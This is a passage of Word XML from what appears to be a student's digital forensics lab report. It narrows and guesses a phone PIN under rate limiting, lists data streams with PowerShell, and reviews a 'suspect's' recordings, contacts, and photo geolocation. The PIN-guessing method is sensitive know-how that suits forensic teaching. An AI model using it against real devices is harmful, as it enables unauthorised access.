          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The method finally worked.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">I conducted tests involving a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'brute-force attack'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, specifically, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'dictionary attacks,'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the attacker systematically attempts various likely passwords from a precompiled list known as a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'dictionary.'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This list generally includes common words, phrases, and combinations that users commonly use as passwords. I did a quick risk assessment for the Brute-Force Attack.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v5wx25q0whev" w:id="87"/>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Number of Possible Password Combinations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We received three clues: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The password consists of four digits, the available digit set is {0, 1, 2, 4, 5, 8}, and the last digit is fixed at '4'. Given this information, I determined the possible combinations for the first three positions. If the password structure is considered as (x y z 4), where each of x, y, and z can take any value from the set {0, 1, 2, 4, 5, 8}, the total number of combinations for the first three positions would indeed be calculated as (6 * 6 * 6),  resulting in 216 combinations.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_az5uqq802dem" w:id="88"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate Limiting Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A rate-limiting mechanism was implemented, where the device locks or delays after a certain number of failed attempts. Initially, the time delay was 30 seconds, but after approximately 30 attempts, it increased to 60 seconds.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xbbiz6qeyxfa" w:id="89"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I determined the total time required for all 216 combinations, considering an average time delay of 60 seconds between each password cracking attempt. The calculated time amounted to approximately 12,900 seconds or 3.58 hours. Given that the estimated time fell below 4 hours, making it affordable, we decided to take the risk and proceed with guessing the password.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vktn9p31pfu" w:id="90"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Experiment Set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I opted to leverage the guessed probable number of the assignment submission date, 1224. Consequently, I chose to work with the password structure (1 _ _ 4), which resulted in a total of only 36 possible combinations. I attempted every possible password from this combination, and one of them was successful.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">{1004  1014  1024  1044  1054  1084</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1104  1114  1124  1144  1154  1184</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1204  1214  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="1c4587"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1224 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1244  1254  1284</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1404  1414  1424  1444  1454  1484</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1504  1514  1524  1544  1554  1584</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1804  1814  1824  1844  1854  1884}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r08hxkf83j6m" w:id="91"/>
      <w:bookmarkEnd w:id="91"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Hint using the PhonePin.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We downloaded the file from the University's Moodle site. Here are the commands we ran using Windows CMD:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$path = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="a2fca2"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"D:\2.2. Study Material\W O R K I N G  D I R E C T O R Y\UWTSD\2.4.5. ACCA7031 - Digital Forensics Analysis\2.4.5.2. Study Material\Lectures\PhonePin.txt"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">gci -Recurse | ForEach-Object { gi $_.FullName -Stream * } | Where-Object Stream -ne </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="a2fca2"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">':$Data'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ffffff"/>
          <w:shd w:fill="333333" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-Content PhonePin.txt &gt; recovered_file.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">However, we could not retrieve the password through this method.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o563g4fhr7kn" w:id="92"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory Insight Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c20lertl6zx9" w:id="93"/>
      <w:bookmarkEnd w:id="93"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audio Transcripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We discovered a total of 23 audio recordings, which were made during July, August, and September of the year 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our team collected the audio transcripts using an online tool called </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://go-transcribe.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Most of the recordings provided clues about the whereabouts of the suspect, who was frequently traveling. For one of the unidentified transcripts, I discerned background announcements that matched those of the National Express bus service in the UK, information which the transcripts themselves could not extract. The recording was 20230815100753.aac.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I compiled a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sheet </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">containing all details gathered from the recordings.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5lza17hhocl4" w:id="94"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contacts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suspect's phone had a work contact saved under the label "3 MM." The phone number associated with this contact, +447383368785, features the +44 country code, indicating it is a UK number. This detail supports the conclusion that the suspect has employment ties in the UK.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another significant finding from the analysis was the presence of contact numbers from various countries, including India, the USA, and the UK, in the suspect's phone data.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x82zjnfg50ov" w:id="95"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Images</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I identified a total of 218 media files, including 6 video files and 1 image file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">".trashed-1696323392-18.jpg,"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which had been moved to the trash. I analyzed the metadata of these files, focusing on their geo-location data. I then compiled all the coordinates along with their corresponding location names in a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sheet </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for further examination.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ew01p1hanunk" w:id="96"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Locations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The geographic coordinates for a total of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">104 media files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> have been precisely identified, out of which only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">57 locations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were unique, based on the location data embedded in the media's metadata.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
          <w:color w:val="3c78d8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
